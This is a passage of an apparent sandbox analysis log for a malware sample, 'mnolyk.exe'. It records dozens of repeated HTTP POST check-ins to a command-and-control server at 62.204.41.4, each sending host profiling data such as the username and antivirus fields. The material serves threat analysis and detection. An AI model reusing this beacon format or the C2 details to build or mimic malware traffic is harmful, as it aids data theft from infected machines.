                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:27.783216953 CET | 622 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            434 | 192.168.2.4 | 50129 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:27.963603020 CET | 623 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:28.028305054 CET | 623 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            435 | 192.168.2.4 | 50130 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:28.215636969 CET | 624 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:28.283009052 CET | 624 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            436 | 192.168.2.4 | 50131 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:28.471918106 CET | 625 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:28.536655903 CET | 625 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            437 | 192.168.2.4 | 50132 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:28.720657110 CET | 626 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:28.783773899 CET | 626 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            438 | 192.168.2.4 | 50133 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:28.968380928 CET | 627 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:29.033627033 CET | 627 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            439 | 192.168.2.4 | 50134 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:29.223273039 CET | 628 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:29.288228035 CET | 628 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            44 | 192.168.2.4 | 49739 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:37.573322058 CET | 233 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:37.639756918 CET | 233 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            440 | 192.168.2.4 | 50135 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:29.463987112 CET | 629 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:29.525877953 CET | 629 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            441 | 192.168.2.4 | 50136 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:29.705547094 CET | 630 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:29.769449949 CET | 630 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            442 | 192.168.2.4 | 50137 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:29.950706959 CET | 631 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:30.013868093 CET | 631 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            443 | 192.168.2.4 | 50138 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:30.185255051 CET | 632 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:30.258173943 CET | 632 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            444 | 192.168.2.4 | 50139 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:30.435909033 CET | 633 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:30.501003027 CET | 633 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            445 | 192.168.2.4 | 50140 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:30.667124033 CET | 634 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:30.729938984 CET | 634 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            446 | 192.168.2.4 | 50141 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:30.904820919 CET | 635 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:30.967626095 CET | 635 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            447 | 192.168.2.4 | 50142 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:31.136436939 CET | 636 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:31.202301025 CET | 636 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            448 | 192.168.2.4 | 50143 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:31.370430946 CET | 637 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:31.433823109 CET  637  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            449  192.168.2.4  50144  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:31.611274958 CET  638  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:31.676038027 CET  638  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            45  192.168.2.4  49740  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:37:37.821742058 CET  234  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:37.884660006 CET  234  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            450  192.168.2.4  50145  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:31.864006042 CET  638  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:31.926784992 CET  639  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            451  192.168.2.4  50146  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:32.113157034 CET  640  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
